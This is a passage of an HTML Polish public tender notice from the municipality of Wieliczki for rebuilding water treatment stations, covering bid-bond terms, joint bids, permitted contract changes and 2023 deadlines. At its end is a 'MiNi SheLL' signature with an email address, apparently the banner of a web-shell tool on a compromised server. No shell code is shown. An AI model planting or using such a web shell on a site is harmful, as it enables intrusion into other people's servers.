środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat wstecz od dnia w którym upływa termin składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane wg wzoru stanowiącego załącznik nr 7 do SWZ wraz z<br/>dowodami określającymi czy ww. roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty, wg<br/>załącznika nr 7 do swz;<br/>2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego odpowiedzialnych za kierowanie robotami<br/>budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie<br/>dysponowania tymi osobami wg załącznika nr 8 do swz;<br/>3) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp., o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który<br/>złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub<br/>wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej wg załącznika nr 5 do swz;<br/>4) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia oraz dokumentem potwierdzającym<br/>opłacenie polisy.<br/>Jeżeli termin objęcia ochroną ubezpieczeniową upływa w trakcie realizacji zamówienia, Wykonawca jest zobowiązany przedłużyć<br/>termin ubezpieczenia i przedstawić Zamawiającemu polisę lub inny dokument potwierdzający zawarcie umowy ubezpieczenia od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). <br/>Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 97 ust. 7 ustawy. <br/>Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy: Bank Spółdzielczy <br/>w Olecku Oddział w Wieliczkach, nr rachunku: 11 9339 0006 0020 0200 0260 0010 z dopiskiem: „Przebudowa stacji uzdatniania wody w Niedźwiedzkich i Kleszczewie” na adres: Gmina Wieliczki, ul. Lipowa 53, 19-404 Wieliczki.<br/>2.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, przed upływem terminu składania ofert, tj. przed upływem dnia i godziny wyznaczonej, jako ostateczny termin składania ofert. <br/>3.	Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale i wystawione na: Gmina Wieliczki, ul. Lipowa 53, 19-404 Wieliczki. <br/>4.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy – Prawo zamówień publicznych. <br/>5.	Zamawiający dokona zwrotu wadium w przypadkach i na zasadach określonych w art. 98 ustawy.<br/>6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 98 ust. 6 pkt 1 i pkt 2, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 125 ust. 1, oświadczenia. <br/>7.	Zamawiający zatrzyma wadium wraz z odsetkami w przypadkach określonych w art. 98 ustawy. <br/>8.	Zamawiający żądać będzie ponownego wniesienia wadium w przypadkach i na zasadach określonych w art. 97 ust. 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy.<br/>2. Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty.<br/>3. Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika.<br/>4. Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich<br/>zastosowanie zasady określone w pkt 1 – 3.<br/>5. Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić<br/>zamawiającemu kopię umowy regulującej współpracę tych wykonawców, zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy,<br/>3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, Strony dopuszczają możliwość zmiany Umowy, która nie prowadzi do<br/>modyfikacji ogólnego charakteru Umowy, a także w przypadku wystąpienia następujących okoliczności:<br/>1) zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy, mające wpływ na termin, sposób lub zakres<br/>realizacji Przedmiotu Umowy — zmiany polegać będą na dostosowaniu Umowy do zmienionych przepisów prawa z<br/>zachowaniem ogólnego charakteru umowy,<br/>2) wystąpienia okoliczności nieleżących po stronie Wykonawcy lub wynikających z uzasadnionych potrzeb Zamawiającego I<br/>skutkujących niemożnością dotrzymania terminu określonego w §2 Umowy zmiany polegać będą na zmianie terminu<br/>realizacji Umowy. Termin ten może ulec przedłużeniu, nie więcej jednak niż o czas trwania okoliczności uzasadniających<br/>zmiany,<br/>3) wydania poleceń określonych w §13 ust. 1 pkt 1-4 w przypadkach, gdy skutki tych poleceń stanowią podstawę do zmiany<br/>terminu zakończenia robót będących przedmiotem umowy lub/i zmiany wynagrodzenia za wykonanie przedmiotu umowy, na<br/>warunkach określonych w § 17 ust. 2 umowy.<br/>4) zmiana terminu przewidzianego na ukończenie robót w tym<br/>a) zmiany spowodowane warunkami atmosferycznymi, w szczególności<br/>- warunki atmosferyczne uniemożliwiające dochowanie wymogów technicznych i technologicznych właściwych dla<br/>przedmiotu umowy, które nie pozwoliły na wykonanie przedmiotu umowy, trwających powyżej 5 dni roboczych – o ile<br/>Wykonawca zgłosił fakt wystąpienia przedmiotowej przesłanki Zamawiającemu w terminie 10 dni od dnia jej zaistnienia;<br/>- odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki geologiczne (kategorie gruntu,<br/>kurzawka, głazy narzutowe itp.);<br/>- odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki terenowe, w szczególności<br/>istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty,<br/>ściany szczelne itp.)<br/>b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności<br/>- wstrzymanie lub przerwanie robót przez Zamawiającego<br/>- przestój i opóźnienia zawinione przez Zamawiającego;<br/>- nieterminowe przekazanie Terenu Budowy przez Zamawiającego;<br/>c) w przypadku wystąpienia siły wyższej trwającej dłużej niż 10 dni roboczych;<br/>d) inne przyczyny zewnętrzne trwające dłużej niż 5 dni roboczych niezależne od Zamawiającego oraz Wykonawcy<br/>skutkujące niemożliwością prowadzenia prac w szczególności:<br/>- brak możliwości dojazdu oraz transportu materiałów na Teren Budowy spowodowany awariami, remontami lub<br/>przebudowami dróg dojazdowych;<br/>- protesty mieszkańców;<br/>- przedłużenie się terminów dostawy materiałów budowlanych;<br/>- przerwa w dostawie energii elektrycznej, wody, gazu;<br/>e) zmiany będące następstwem działania organów administracji publicznej, a w szczególności przekroczenie terminów<br/>wydawania lub odmowa wydania wymaganych decyzji, zezwoleń uzgodnień itp., z przyczyn niezawinionych przez Wykonawcę.<br/>5) pozostałe rodzaje zmian spowodowane następującymi okolicznościami<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy;<br/>b) zmiany uzasadnione okolicznościami, o których mowa w art. 357¹ kodeksu cywilnego;<br/>6) zmiana osoby wymienionej w § 8 ust. 3 umowy na zasadach określonych w § 8 ust, 4 umowy.<br/>2. Przypadki wymienione w ust. 1 pkt 1-5 umowy, mogą między innymi rzutować na zmianę terminu wykonania przedmiotu<br/>zamówienia. Wydłużenie terminu wykonania przedmiotu umowy z ww. powodów nie może powodować dodatkowych<br/>roszczeń wobec Zamawiającego ze strony Wykonawcy.<br/>3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ug_wieliczki/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-05 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com